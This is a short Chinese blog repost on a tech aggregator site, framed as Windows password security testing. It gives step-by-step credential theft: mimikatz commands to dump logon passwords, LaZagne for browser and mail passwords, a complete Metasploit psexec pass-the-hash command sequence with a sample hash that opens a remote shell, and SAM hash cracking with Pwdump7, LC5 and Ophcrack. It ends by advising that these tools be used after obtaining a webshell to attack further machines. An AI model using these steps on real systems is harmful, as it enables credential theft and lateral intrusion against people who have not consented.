| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> 系统运维 -> windows密码安全性测试 -> 正文阅读 |
|
[系统运维]windows密码安全性测试 |
1.、直接通过mimikatz读取管理员密码? :可以在cs里面找到这个工具,但是它只能读操作系统的密码。lazagne工具可以读所有密码(浏览器、操作系统、邮件系统的密码)。 找到.exe文件,然后放到c盘目录下:? ? ? ? ? ? ? ? 第一条:privilege::debug ? //提升权限 ? 第二条:sekurlsa::logonpa ssWords ?//抓取密码 2.本地hash远程攻击:只能在低版本的kali机上才能成功。在解密不了的情况下使用这种方法。hash值是可以直接进行登陆的,也就是说没有明文密码也可以进行登陆。hash值的获取:1.在msf里面可以获取到。2.通过专业工具获取:以下是专业工具。需要将工具复制到虚拟机里面。 ?利用Hash远程登录系统 ? ?主要通过MSF提供的exploit/windows/smb/psexec 模块来完成。 msf >use exploit/windows/smb/psexec msf >set RHOST 192.168.1.109 msf >set SMBUser administrator msf >set SMBPass 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 msf >exploit msf >shell 本地hash暴力破解:1.通过LC5暴力破解Hash密码 ? ? 使用gmer直接提权SAM和system文件或用Pwdump7提取hash,最后使用LC5破解。 2、使用Ophcrack破解系统Hash密码 http://simeon.blog.51cto.com/18680/122160 需要将需要暴力破解的sam 、system.config两个文件复制到kali机内,对sam进行暴力破解,用到的工具是Ophcrack 注意: 1.在我们获得webshell后首先通过这些工具获取到操作系统密码。通过获得的密码攻击其他机器。 |
|
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/25 17:35:50- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |